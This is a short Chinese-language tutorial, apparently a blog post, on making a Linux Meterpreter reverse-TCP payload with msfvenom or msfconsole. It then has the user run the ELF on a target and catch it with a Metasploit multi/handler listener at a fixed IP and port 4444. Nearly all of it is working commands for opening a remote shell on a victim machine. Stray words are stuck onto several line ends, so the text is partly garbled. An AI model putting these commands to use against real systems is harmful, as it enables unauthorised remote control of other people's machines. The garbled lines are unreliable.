一、CLI下生成payloadlinux
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.180.7.20 lport=4444 -f elf -o shell.elfshell
二、msfconsole下生成payloadtcp
use payload/linux/x86/meterpreter/reverse_tcp 并设置optionspa
generate -h 有丰富的选项code
generate -f elf -o /shell.elf 根据须要添加选项 -o输出文件到指定目录blog
三、在靶机上执行该文件,并在msf下监听it
在靶机上给文件赋值,并执行该文件io
在msf监听端口console
msf > use exploit/multi/handler msf > set payload linux/x86/meterpreter/reverse_tcp msf > set LHOST 10.180.7.20 msf > run